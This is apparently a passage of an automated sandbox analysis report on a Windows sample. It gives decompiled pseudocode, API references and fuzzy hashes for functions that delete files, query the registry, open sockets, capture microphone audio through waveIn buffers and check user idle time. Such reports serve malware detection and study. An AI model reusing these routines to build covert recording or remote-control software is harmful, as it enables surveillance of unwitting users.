                                  • Instruction ID: f5d1e7a26b168e10bd759941827291fab992d242b1d9cf9e3ab824cccb0e0fd7
                                  • Opcode Fuzzy Hash: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                  • Instruction Fuzzy Hash: 66E0ED31910518CBDB04EBE1EC5DAEDB734FB94316F10483AE113A60E1DB785556CA18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406CFF, Relevance: 7.5, APIs: 5, Instructions: 25fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 25%
                                  			E00406CFF(WCHAR* __eax, void* __ecx) {
				WCHAR* _t5;
				signed int _t8;
				signed int _t9;
				void* _t15;

				_t15 = __ecx;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t5 = DeleteFileW(__eax);
				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(_t15 + 0x64, 0x415800);
				if(_t5 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					RemoveDirectoryW(_t5);
				}
				return _t9;
			}







                                  0x00406d01
                                  0x00406d06
                                  0x00406d0d
                                  0x00406d15
                                  0x00406d21
                                  0x00406d2b
                                  0x00406d2f
                                  0x00406d36
                                  0x00406d36
                                  0x00406d40

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B900,00000000,00406D78), ref: 00406D06
                                  • DeleteFileW.KERNEL32(00000000), ref: 00406D0D
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041B89C,00415800), ref: 00406D21
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00406D2F
                                  • RemoveDirectoryW.KERNEL32(00000000), ref: 00406D36
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                  • String ID:
                                  • API String ID: 1823182134-0
                                  • Opcode ID: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                  • Instruction ID: 37aca360b5e6e25e1cbc72d235888c1a7b4a7ee3696255f0ca1c3cc056b1b9b3
                                  • Opcode Fuzzy Hash: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                  • Instruction Fuzzy Hash: EFE04F76541E25EBCA051BA0EC0C5CE3768AE85262394803AF802A3150CB6888458B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D7E4, Relevance: 7.5, APIs: 5, Instructions: 23COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E0040D7E4(void* __eflags) {
				char* _t5;
				void* _t19;

				_t5 = E0040180C(_t19 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				CloseWindow(atoi(_t5));
				E004017DD(_t19 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                  0x0040d7e9
                                  0x0040d7f0
                                  0x0040d7ff
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7F0
                                  • atoi.MSVCRT ref: 0040D7F7
                                  • CloseWindow.USER32 ref: 0040D7FF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@CloseWindowatoi
                                  • String ID:
                                  • API String ID: 14144500-0
                                  • Opcode ID: 47d07381fc7f33689a1353f39abe6eb979ecef49076387eb86944de5fc978131
                                  • Instruction ID: fbc29b80efd9e4125448cee2552d84d25da0c547aa8720e2220b6587ca76b5c9
                                  • Opcode Fuzzy Hash: 47d07381fc7f33689a1353f39abe6eb979ecef49076387eb86944de5fc978131
                                  • Instruction Fuzzy Hash: 26E0E532910518CBDB04ABF1EC5DAEDB734FB90316B00883AE012E30E0EF785945CB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004050C0, Relevance: 7.5, APIs: 5, Instructions: 16COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050D0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050D9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050E2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050EB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050F4
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ??1?$basic_string@U?$char_traits@V?$allocator@$D@2@@std@@D@std@@$G@2@@std@@G@std@@
                                  • String ID:
                                  • API String ID: 1976170855-0
                                  • Opcode ID: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                  • Instruction ID: df7224a0d3b933aacf5f44a1e86bfce5252a8e6dee322f0028cbab2c50653025
                                  • Opcode Fuzzy Hash: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                  • Instruction Fuzzy Hash: D4E0B630010E0ECBC7289B10E9598EABBB0FF90B46300843EA463434B0DFB0694ACB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402750, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(KeepAlive Disabled!,?,0041BE70,0041BE70), ref: 00402771
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([WARNING],?), ref: 00402785
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                  • String ID: KeepAlive Disabled!$[WARNING]
                                  • API String ID: 2944585167-3856563802
                                  • Opcode ID: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                  • Instruction ID: a30e930004435671851b5eafd83b9c9ec9f6d71b75df5e3fdd77de3efe23ec90
                                  • Opcode Fuzzy Hash: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                  • Instruction Fuzzy Hash: F3F027705103187FEB10B729C94EBEE7F8C8742354F40006AEC11532C1E6F9A9C486EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401895, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018A7
                                  • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(0041BCB0,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018B4
                                  • _CxxThrowException.MSVCRT(?,00416F28), ref: 004018C3
                                    • Part of subcall function 0040190F: ??2@YAPAXI@Z.MSVCRT ref: 0040191F
                                  Strings
                                  • invalid vector<T> subscript, xrefs: 004018A2
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@??2@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                  • String ID: invalid vector<T> subscript
                                  • API String ID: 1986322901-3016609489
                                  • Opcode ID: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                  • Instruction ID: dbd3af195aa641a4d32eff83d77deebdd7394ec7269c4e3ee2ba11d1d7788022
                                  • Opcode Fuzzy Hash: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                  • Instruction Fuzzy Hash: 0FE0E57145430EBBDF04FBE1DD46DEDB77CAB14745F100016F50062091FA75A6598769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040500C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,00000000,0041B8D8,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040501E
                                  • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040502B
                                  • _CxxThrowException.MSVCRT(?,00416F28), ref: 0040503A
                                  Strings
                                  • invalid vector<T> subscript, xrefs: 00405019
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                  • String ID: invalid vector<T> subscript
                                  • API String ID: 3609083747-3016609489
                                  • Opcode ID: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                  • Instruction ID: 9be96ab786121cdca3df7d0b72c820f15abd94e2066078dc6746ba185848b686
                                  • Opcode Fuzzy Hash: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                  • Instruction Fuzzy Hash: ADD0127181030FFBCF00FBE0DD49CEDB77CAA04709B100015B511A3054FA74A64E8B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412019, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412019() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x41c1dc = _t2;
				return _t2;
			}




                                  0x0041202f
                                  0x00412035
                                  0x0041203a

                                  APIs
                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00412028
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041202F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetLastInputInfo$User32.dll
                                  • API String ID: 2574300362-1519888992
                                  • Opcode ID: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                  • Instruction ID: 4254d4a464572d01fe3095e43ecaf4df99145fa2531fe7b32d94017085124a09
                                  • Opcode Fuzzy Hash: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                  • Instruction Fuzzy Hash: F2C09B709D0650FB86011FA0AD1DBD83B15664B745721C933B902F5251CBB8D080EF1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F4AE, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040F4AE() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x41bf1c = _t2;
				return _t2;
			}




                                  0x0040f4c4
                                  0x0040f4ca
                                  0x0040f4cf

                                  APIs
                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F4BD
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040F4C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetCursorInfo$User32.dll
                                  • API String ID: 1646373207-2714051624
                                  • Opcode ID: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                  • Instruction ID: c5b485f27e89021cea1a89f12a6954dfd40793fe5a01e249b662889bc5cfc0be
                                  • Opcode Fuzzy Hash: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                  • Instruction Fuzzy Hash: F0C04C75551600A686005FA1BC0D6D53A14A956745711C436B802B1255CB7C41459E5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413AED, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00413AED() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
				 *0x41c1f8 = _t2;
				return _t2;
			}




                                  0x00413b03
                                  0x00413b09
                                  0x00413b0e

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00413AFC
                                  • GetProcAddress.KERNEL32(00000000), ref: 00413B03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetConsoleWindow$kernel32.dll
                                  • API String ID: 2574300362-100875112
                                  • Opcode ID: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                  • Instruction ID: 6ee53b0f0035eccf7fe7e145557d43f0b39688fed8dbf49153f7f93891f0b47b
                                  • Opcode Fuzzy Hash: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                  • Instruction Fuzzy Hash: 83C09BB4AD1611FB86015FA0BC4EAC87B145A46707332C077781191255DA7880C45A1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B615, Relevance: 6.1, APIs: 4, Instructions: 57registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0040B615(void* __ecx, intOrPtr _a4, void* _a8, short* _a12, char _a15) {
				int _v8;
				int _v12;
				char* _t31;
				signed int _t36;
				signed int _t37;
				void* _t46;

				_v8 = 0;
				_t31 = 0x415664;
				if(RegQueryValueExW(_a8, _a12, 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
					_t31 = malloc(_v8);
					_t36 = _v8;
					_t46 = _t31;
					_t37 = _t36 >> 2;
					memset(_t46 + _t37, memset(_t46, 0, _t37 << 2), (_t36 & 0x00000003) << 0);
					RegQueryValueExW(_a8, _a12, 0,  &_v12, _t31,  &_v8);
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t31,  &_a15);
				return _a4;
			}









                                  0x0040b62f
                                  0x0040b635
                                  0x0040b641
                                  0x0040b652
                                  0x0040b654
                                  0x0040b65b
                                  0x0040b65d
                                  0x0040b667
                                  0x0040b67a
                                  0x0040b67a
                                  0x0040b684
                                  0x0040b691

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B63D
                                  • malloc.MSVCRT ref: 0040B64B
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B67A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415664,?), ref: 0040B684
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryV?$allocator@Value$??0?$basic_string@G@1@@G@2@@std@@G@std@@U?$char_traits@malloc
                                  • String ID:
                                  • API String ID: 3506253819-0
                                  • Opcode ID: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                  • Instruction ID: 6657ce7e0b4af722a3644f787a918a8cc9d20f3304ca96b666d2b0068cb46159
                                  • Opcode Fuzzy Hash: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                  • Instruction Fuzzy Hash: 3E11097260010DFFDB05DF95DD80DEFBBBDEB88250B10406ABA05D6250D7719E149BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004028CD, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004028DC
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402915
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402928
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040295E,00000001,00000073), ref: 00402953
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@$??1?$basic_string@??4?$basic_string@V01@connectsocket
                                  • String ID:
                                  • API String ID: 182292213-0
                                  • Opcode ID: e8679a6b84cd13b518d2f85527ac5e7d509b52d12921196b337c3ffbd5f7c91e
                                  • Instruction ID: 3575325012e9a6a69ab12c81105f5cb7c7dcd4fb264b21d23710b3ab9203063c
                                  • Opcode Fuzzy Hash: e8679a6b84cd13b518d2f85527ac5e7d509b52d12921196b337c3ffbd5f7c91e
                                  • Instruction Fuzzy Hash: 0301B97170030867DB00BB76DE4D6EE3A5DDBC5350F40803ABE169B2D1CBB9894483D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401181, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00401181(void* __eflags, signed int _a4) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t22;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				signed int _t36;

				_t38 = __eflags;
				E0040180C(0x41b200, __eflags, _a4);
				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d4);
				_t36 = _a4 << 5;
				_t16 = E0040180C(0x41b200, _t38, _a4);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t28 =  *0x41b1dc; // 0x1422ca8
				 *((intOrPtr*)(_t36 + _t28)) = _t16;
				_t17 =  *0x41b1dc; // 0x1422ca8
				_t29 =  *0x41b1d4; // 0x0
				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;
				_t30 =  *0x41b1dc; // 0x1422ca8
				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;
				_t31 =  *0x41b1dc; // 0x1422ca8
				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;
				_t32 =  *0x41b1dc; // 0x1422ca8
				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;
				_t33 =  *0x41b1dc; // 0x1422ca8
				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;
				_t19 =  *0x41b1dc; // 0x1422ca8
				waveInPrepareHeader( *0x41b198, _t19 + _t36, 0x20);
				_t22 =  *0x41b1dc; // 0x1422ca8
				return waveInAddBuffer( *0x41b198, _t36 + _t22, 0x20);
			}














                                  0x00401181
                                  0x00401196
                                  0x0040119d
                                  0x004011ab
                                  0x004011ae
                                  0x004011b5
                                  0x004011bb
                                  0x004011c3
                                  0x004011c6
                                  0x004011cb
                                  0x004011d1
                                  0x004011d5
                                  0x004011dd
                                  0x004011e1
                                  0x004011e7
                                  0x004011eb
                                  0x004011f1
                                  0x004011f5
                                  0x004011fb
                                  0x004011ff
                                  0x0040120d
                                  0x00401213
                                  0x0040122c

                                  APIs
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,0040116A,00000000), ref: 0040119D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,0040116A,00000000), ref: 004011B5
                                  • waveInPrepareHeader.WINMM(01422CA8,00000020,?,?,0040116A,00000000), ref: 0040120D
                                  • waveInAddBuffer.WINMM(?,00000020,?,?,0040116A,00000000), ref: 00401223
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                  • String ID:
                                  • API String ID: 1952094867-0
                                  • Opcode ID: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                  • Instruction ID: 8f998c45a3acb3b0b10d37a494ac82bd1c86fe74dd73c150e7a1b96005ae6754
                                  • Opcode Fuzzy Hash: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                  • Instruction Fuzzy Hash: 83111835600644FFCB159F65EC689E67BE6EB89394702C83DED0A87365DB31A801CBD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B5A2, Relevance: 6.0, APIs: 4, Instructions: 37registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 18%
                                  			E0040B5A2(intOrPtr _a4, void* _a8, short* _a12, char _a15, short* _a16) {
				int _v8;
				char _v2056;

				_v8 = 0x400;
				if(RegOpenKeyExW(_a8, _a12, 0, 0x20019,  &_a8) != 0) {
					_push( &_a15);
					_push(0x415800);
				} else {
					RegQueryValueExW(_a8, _a16, 0, 0,  &_v2056,  &_v8);
					RegCloseKey(_a8);
					_push( &_a15);
					_push( &_v2056);
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z();
				return _a4;
			}





                                  0x0040b5ae
                                  0x0040b5cb
                                  0x0040b601
                                  0x0040b602
                                  0x0040b5cd
                                  0x0040b5e2
                                  0x0040b5eb
                                  0x0040b5f4
                                  0x0040b5fb
                                  0x0040b5fb
                                  0x0040b60a
                                  0x0040b614

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                  • RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                  • RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                  • String ID:
                                  • API String ID: 4081865614-0
                                  • Opcode ID: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                  • Instruction ID: 08c4fdd74f089b672de4800a8e1209c34edbbd410ac70e3f0c9e675f1f7a205c
                                  • Opcode Fuzzy Hash: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                  • Instruction Fuzzy Hash: 3D01F67554010EFFDB11DF90ED45FDA7BBCFB08304F508062BA05AA1A0D770AA199B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D87E, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E0040D87E() {
				char _t9;
				void* _t22;
				void* _t28;
				intOrPtr _t29;

